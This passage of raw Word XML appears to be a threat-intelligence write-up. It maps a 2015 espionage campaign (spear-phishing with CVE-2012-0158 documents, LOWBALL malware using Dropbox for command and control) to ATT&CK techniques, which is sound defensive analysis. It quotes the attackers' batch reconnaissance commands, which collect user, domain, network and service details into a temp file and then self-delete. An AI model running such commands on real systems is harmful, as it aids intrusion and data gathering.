      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00167E32">
        <w:t>Bubblewrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00167E32">
        <w:t xml:space="preserve"> load sequence).</w:t>
      </w:r>
      <w:r w:rsidR="00227A6C">
        <w:t xml:space="preserve"> [????]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB5803" w14:textId="1C680B5A" w:rsidR="001022C9" w:rsidRDefault="001022C9" w:rsidP="00B16144">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Y-Security performs Attack Simulations, Penetration Tests, and Security Trainings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via Google a restatement of ATT&amp;CK data)</w:t>
      </w:r>
      <w:r w:rsidR="00227A6C">
        <w:t xml:space="preserve"> [????]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A23B1" w14:textId="51407E1C" w:rsidR="001022C9" w:rsidRDefault="001022C9" w:rsidP="00B16144">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Malware That Hides C&amp;C Server on Dropbox Detected in the Wild (softpedia.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via Google - a little more clarity on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bubblewrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00227A6C">
        <w:t xml:space="preserve"> [2015]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7D4CE" w14:textId="6B1F07D3" w:rsidR="00F800DF" w:rsidRDefault="00F800DF" w:rsidP="00B16144">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>(PDF) State-of-the-Art in Chinese APT Attack and Using Threat Intelligence for Detection. A Survey (researchgate.net)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0079745D">
        <w:t xml:space="preserve"> (a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0079745D">
        <w:t>high level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0079745D">
        <w:t xml:space="preserve"> summary, again a restatement of ATT&amp;CK data)</w:t>
      </w:r>
      <w:r w:rsidR="00227A6C">
        <w:t xml:space="preserve"> [2022]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C0FDB" w14:textId="369CDD2D" w:rsidR="00D11489" w:rsidRDefault="00D11489" w:rsidP="00B16144">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BUBBLEWRAP, Software S0043 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="69F91737" w14:textId="77777777" w:rsidR="00C94979" w:rsidRDefault="00C94979" w:rsidP="00000CDE">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33ADA5E0" w14:textId="10F389C5" w:rsidR="00000CDE" w:rsidRPr="00A15B0C" w:rsidRDefault="00000CDE" w:rsidP="00000CDE">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A15B0C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pre August 2015</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19CF3FC6" w14:textId="2DE92C62" w:rsidR="00000CDE" w:rsidRDefault="00000CDE" w:rsidP="00000CDE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00000CDE">
        <w:t>pear phishing emails written in English, destined for Western audiences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249E7210" w14:textId="77777777" w:rsidR="00000CDE" w:rsidRPr="00A15B0C" w:rsidRDefault="00000CDE" w:rsidP="00000CDE">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A15B0C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>August 2015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE1247" w14:textId="5A9488B7" w:rsidR="00000CDE" w:rsidRPr="004F19D3" w:rsidRDefault="00C67790" w:rsidP="00B16144">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000CDE">
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000CDE">
        <w:t xml:space="preserve"> - Hong Kong based organisations</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004F19D3">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00000CDE" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00000CDE" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000CDE" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000CDE" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0924E" w14:textId="252CA6C0" w:rsidR="00575C9A" w:rsidRDefault="00575C9A" w:rsidP="00B16144">
      <w:r>
        <w:t>Three .doc files (</w:t>
      </w:r>
      <w:r w:rsidRPr="004F19D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2012-0158</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004F5E83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004F5E83">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5E83" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004F5E83" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1203 Exploitation for Client Execution</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5E83">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00697CE4">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="00697CE4" w:rsidRPr="00697CE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002</w:t>
      </w:r>
      <w:r w:rsidR="00697CE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00697CE4" w:rsidRPr="00697CE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Execution: Malicious File</w:t>
      </w:r>
      <w:r w:rsidR="00697CE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA6084" w14:textId="7D1E0E1C" w:rsidR="00A15B0C" w:rsidRDefault="00A15B0C" w:rsidP="00A15B0C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Attachment – LOWBALL malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34CF78" w14:textId="50FCF66D" w:rsidR="00A15B0C" w:rsidRDefault="00A15B0C" w:rsidP="00A15B0C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Indicators of compromise for malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386A737" w14:textId="38D64B27" w:rsidR="00A15B0C" w:rsidRDefault="00A15B0C" w:rsidP="00A15B0C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>This backdoor uses Dropbox cloud storage service to act as C&amp;C server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DEAA4" w14:textId="58B00ACC" w:rsidR="00A15B0C" w:rsidRDefault="00A15B0C" w:rsidP="00A15B0C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Dropbox API with hardcoded bearer access token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B154A" w14:textId="6CC0A19D" w:rsidR="00A15B0C" w:rsidRDefault="00A15B0C" w:rsidP="00A15B0C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Upload/download/execute files</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3" w:rsidRPr="004F19D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E236EF" w14:textId="66D0F610" w:rsidR="00A15B0C" w:rsidRDefault="00A15B0C" w:rsidP="00A15B0C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>HTTPS port 443</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3" w:rsidRPr="004F19D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1071.001 Application Layer Protocol: Web Protocols</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C0051" w14:textId="0459624C" w:rsidR="00575C9A" w:rsidRDefault="00575C9A" w:rsidP="00575C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Downloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">WmiApCom.bat (to start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WmiApCom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download new version of LOWBALL)</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004F19D3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="004F19D3" w:rsidRPr="004F19D3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004F19D3" w:rsidRPr="004F19D3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1105 Ingress Tool Transfer</w:t>
      </w:r>
      <w:r w:rsidR="004F19D3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFF405" w14:textId="77777777" w:rsidR="00EF1C75" w:rsidRDefault="00EF1C75" w:rsidP="00575C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Threatgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> monitors C&amp;C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35089411" w14:textId="70CA06BF" w:rsidR="008F5F59" w:rsidRDefault="00575C9A" w:rsidP="008F5F59">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Create .bat file</w:t>
      </w:r>
      <w:r w:rsidR="00EF1C75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and execute on target</w:t>
      </w:r>
      <w:r w:rsidR="008F5F59">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F5F59">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008F5F59" w:rsidRPr="008F5F59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.003</w:t>
      </w:r>
      <w:r w:rsidR="008F5F59" w:rsidRPr="004F5E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Scripting Interpreter: Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="008F5F59">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F705B" w14:textId="77777777" w:rsidR="008F5F59" w:rsidRDefault="008F5F59" w:rsidP="008F5F59">
      <w:r>
        <w:t>We observed the threat group issue the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50040C27" w14:textId="77777777"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@echo off </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D277F0E" w14:textId="7C98156F" w:rsidR="008F5F59" w:rsidRPr="00B412A1" w:rsidRDefault="008F5F59" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\ &gt;&gt; %temp%\download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1083 File and Directory Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C93C33E" w14:textId="77777777"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ipconfig /all &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E3813" w14:textId="77777777"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net user &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB64D4" w14:textId="77777777"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net user /domain &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDE950" w14:textId="30436F23"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; %temp%\download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00731BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00731BE7" w:rsidRPr="00731BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00731BE7" w:rsidRPr="00731BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1082 System Information Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00731BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A20183" w14:textId="1518E27D"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del %0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50885E" w14:textId="77777777"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@echo off </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45382489" w14:textId="5283C4A4"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> "c:\Documents and Settings" &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD00B74" w14:textId="5D4559C3"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> "c:\Program Files\ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003B17D8" w:rsidRPr="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B17D8" w:rsidRPr="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1016 System Network Configuration Discovery</w:t>
      </w:r>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0402642C" w14:textId="14FA9919"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 &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E93B34" w14:textId="0CE12425"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net start &gt;&gt; %temp%\download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003B17D8" w:rsidRPr="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B17D8" w:rsidRPr="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1007 System Service Discovery</w:t>
      </w:r>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6913AC" w14:textId="2914CA01" w:rsidR="008F5F59" w:rsidRPr="00B412A1" w:rsidRDefault="008F5F59" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrator &gt;&gt; %temp%\download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FC24BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00FC24BB" w:rsidRPr="00FC24BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1069.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FC24BB" w:rsidRPr="00FC24BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
